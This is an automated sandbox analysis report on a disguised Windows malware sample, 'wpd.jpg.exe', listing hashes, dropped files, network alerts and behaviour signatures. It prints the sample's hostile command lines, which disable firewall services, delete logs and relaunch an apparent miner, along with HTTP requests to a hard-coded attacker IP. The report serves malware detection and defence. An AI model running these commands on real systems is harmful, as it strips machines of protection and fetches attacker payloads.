Category | Machine | Started | Completed |
---|---|---|---|
ARCHIVE | s1_win7_x6403_us | June 7, 2024, 5:50 p.m. | June 7, 2024, 5:52 p.m. |
Archive wpd.jpg.exe @ sandbox.zip
Summary
Size | 8.4MB |
---|---|
Type | PE32 executable (console) Intel 80386, for MS Windows |
MD5 | 1bfe19a314dd31d6adda302f177c3b7c |
SHA1 | 37fd59aa2c2b77c8757438075138f11eaedf81b8 |
SHA256 | b63ce450e4d34d1cdd727a1a246d38167f45aeacc69d15c6922ef723e49a3cf7 |
SHA512 | b486b312f809146fbe95f121ea9d7bfc152266e5ca1a178316aafe4ca21e4a80ffa76b5c7e36758d45714439b34f7f6fa6d3ed2a599f64fd7dfe5a23d416a638 |
CRC32 | CD831527 |
ssdeep | 196608:1M6/uTeIz//QEJZe+t6SuqYTFLQmEe2r06+mVWFO5p5adyuFqAHBLgMP:l/YeIzAYe+t1uTJQddQ3Qub |
Yara | |

Process | Command line | PID |
---|---|---|
cmd.exe | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto | 2164 |
taskkill.exe | taskkill /f /im csrs.exe | 2240 |
sc.exe | sc start netprofm | 2384 |
sc.exe | sc config netprofm start= auto | 2456 |
sc.exe | sc start NlaSvc | 2572 |
sc.exe | sc config NlaSvc start= auto | 2644 |
cmd.exe | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log | 2740 |
taskkill.exe | taskkill /im csrs.exe /f | 3552 |
csrs.exe | csrs.exe -m 6 -t 200 -l 9999 | 3756 |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49758 -> 192.168.57.17:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity |
TCP 192.168.56.103:49844 -> 192.168.57.51:1433 | 2001583 | ET SCAN Behavioral Unusual Port 1433 traffic Potential Scan or Infection | Misc activity |
TCP 192.168.56.103:50021 -> 192.168.57.100:445 | 2001569 | ET SCAN Behavioral Unusual Port 445 traffic Potential Scan or Infection | Misc activity |
Suricata TLS
No Suricata TLS
section | xx0 |
section | xx1 |
section | xx2 |
resource name | BIN |
resource name | TXT |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/xpxmr.txt |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/ok/wpd.html |
suspicious_features | Connection to IP address | suspicious_request | GET http://104.37.187.182/wpdmd5.txt |
suspicious_features | Connection to IP address | suspicious_request | GET http://104.37.187.182/wpdtest.txt |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/ver.txt |
suspicious_features | GET method with no useragent header, Connection to IP address | suspicious_request | GET http://104.37.187.182/shellver.txt |
request | GET http://104.37.187.182/xpxmr.txt |
request | GET http://104.37.187.182/ok/wpd.html |
request | GET http://104.37.187.182/wpdmd5.txt |
request | GET http://104.37.187.182/wpdtest.txt |
request | GET http://104.37.187.182/ver.txt |
request | GET http://104.37.187.182/shellver.txt |
name | BIN | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e90a5c | size | 0x0001e059 |
name | TXT | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00eaeab8 | size | 0x0008d49b |
name | RT_STRING | language | LANG_CHINESE | filetype | empty | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00f3bf54 | size | 0x00000038 |
name | RT_VERSION | language | LANG_CHINESE | filetype | COM executable for DOS | sublanguage | SUBLANG_CHINESE_SIMPLIFIED | offset | 0x00e0c350 | size | 0x000002b8 |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\python27.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcp90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcr90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcm90.dll |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f |
cmdline | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Util._counter.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._DES3.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\_hashlib.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\cryptography.hazmat.bindings._constant_time.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcr90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\_socket.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\select.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Hash._MD4.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\python27.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcm90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcp90.dll |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\_ssl.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._DES.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\_cffi_backend.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Random.OSRNG.winrandom.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\pyexpat.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Util.strxor.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\cryptography.hazmat.bindings._openssl.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._AES.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Hash._SHA256.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._ARC4.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\bz2.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\_ctypes.pyd |
file | C:\Users\test22\AppData\Local\Temp\_MEI37122\unicodedata.pyd |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csrs.exe") |
section | {u'size_of_data': u'0x0085f400', u'virtual_address': u'0x005ac000', u'entropy': 7.92303226230594, u'name': u'xx2', u'virtual_size': u'0x0085f2c0'} | entropy | 7.92303226231 | description | A section with a high entropy has been found |
entropy | 0.99953363647 | description | Overall entropy of this PE file is high |
description | Create a windows service | rule | Create_Service |
description | Communications over RAW Socket | rule | Network_TCP_Socket |
description | Communication using DGA | rule | Network_DGA |
description | Match Windows Http API call | rule | Str_Win32_Http_API |
description | Take ScreenShot | rule | ScreenShot |
description | Escalate priviledges | rule | Escalate_priviledges |
description | Steal credential | rule | local_credential_Steal |
description | task schedule | rule | schtasks_Zero |
description | PWS Memory | rule | Generic_PWS_Memory_Zero |
description | Hijack network configuration | rule | Hijack_Network |
description | Record Audio | rule | Sniff_Audio |
description | Communications over HTTP | rule | Network_HTTP |
description | Communications use DNS | rule | Network_DNS |
description | Code injection with CreateRemoteThread in a remote process | rule | Code_injection |
description | (no description) | rule | DebuggerCheck__GlobalFlags |
description | (no description) | rule | DebuggerCheck__QueryInfo |
description | (no description) | rule | DebuggerCheck__RemoteAPI |
description | (no description) | rule | DebuggerHiding__Thread |
description | (no description) | rule | DebuggerHiding__Active |
description | (no description) | rule | DebuggerException__ConsoleCtrl |
description | (no description) | rule | DebuggerException__SetConsoleCtrl |
description | (no description) | rule | ThreadControl__Context |
description | (no description) | rule | SEH__vectored |
description | (no description) | rule | Check_Dlls |
description | Possibly employs anti-virtualization techniques | rule | vmdetect |
description | Checks if being debugged | rule | anti_dbg |
description | Anti-Sandbox checks for ThreatExpert | rule | antisb_threatExpert |
description | Bypass DEP | rule | disable_dep |
description | Affect hook table | rule | win_hook |
description | File Downloader | rule | Network_Downloader |
description | Match Windows Inet API call | rule | Str_Win32_Internet_API |
description | Install itself for autorun at Windows startup | rule | Persistence |
description | Communications over FTP | rule | Network_FTP |
description | Run a KeyLogger | rule | KeyLogger |
description | Communications over P2P network | rule | Network_P2P_Win |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f |
cmdline | sc start NlaSvc |
cmdline | taskkill /f /im csrs.exe |
cmdline | sc config NlaSvc start= auto |
cmdline | sc start netprofm |
cmdline | sc stop 1MpsSvc |
cmdline | taskkill /im csrs.exe /f |
cmdline | C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log |
cmdline | sc config 1MpsSvc start= disabled |
cmdline | C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto |
cmdline | sc config netprofm start= auto |
cmdline | sc config WinNsaSrv start= disabled |
cmdline | net stop WinNsaSrv |
host | 104.37.187.182 |
host | 139.5.177.32 |
description | wpd.jpg.exe tried to sleep 207 seconds, actually delayed analysis time by 207 seconds |
description | csrs.exe tried to sleep 1750 seconds, actually delayed analysis time by 1750 seconds |